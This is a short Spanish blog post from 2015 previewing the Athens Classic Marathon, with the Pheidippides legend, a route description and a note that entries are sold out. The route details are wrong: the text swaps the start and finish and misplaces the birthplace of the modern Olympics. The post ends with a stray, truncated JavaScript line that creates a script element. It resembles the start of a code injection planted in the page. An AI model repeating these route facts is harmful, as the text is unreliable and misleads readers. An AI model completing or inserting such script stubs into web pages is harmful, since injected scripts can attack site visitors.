Maratón de Atenas

26/10/2015

Corredor de maratón

El próximo 8 de noviembre tendrá lugar en la capital de Grecia uno de los maratones por excelencia: el Maratón Clásico de Atenas. Todos los años, esta ciudad griega rinde homenaje a Filipides, aquel heroico soldado griego que en el 490 a.c. falleció de puro cansancio. En teoría, el enorme esfuerzo que realizó corriendo desde Maratón hasta Atenas -40 kilómetros- para anunciar a los griegos que finalmente habían derrotado a los persas, lo llevó a la tumba. Ya os lo hemos contado en alguna otra ocasión con mayor lujo de detalles, pero fue de esta manera como surgió tanto el nombre como la tradición del maratón.

En la actualidad la hazaña de Filipides sigue estando presente en el Maratón de Atenas. El recorrido oficial está trazado en base al recorrido que el soldado realizó en su momento. Sobra decir que éste aúna lo mejor de lo mejor de la ciudad, pasando por delante de algunos de los monumentos griegos más importantes y emblemáticos. De hecho, la línea de salida está en el Estadio Panathinaikó y la línea de meta en el Estadio Olímpico de Atenas, el lugar que vio nacer los Juegos Olímpicos Modernos.

Todo aquel que ha participado en este maratón cuenta que la experiencia es única e indescriptible. Las inscripciones para esta edición estás agotadas. Siempre nos queda participar como espectadores o comenzar a madurar la idea de participar para el próximo año. Nunca se sabe, puede que el 2016 sea un buen año para hacerlo. 🙂

Foto | ANA BELÉN CANTERO PAZ

var d=document;var s=d.createElement(‘script’);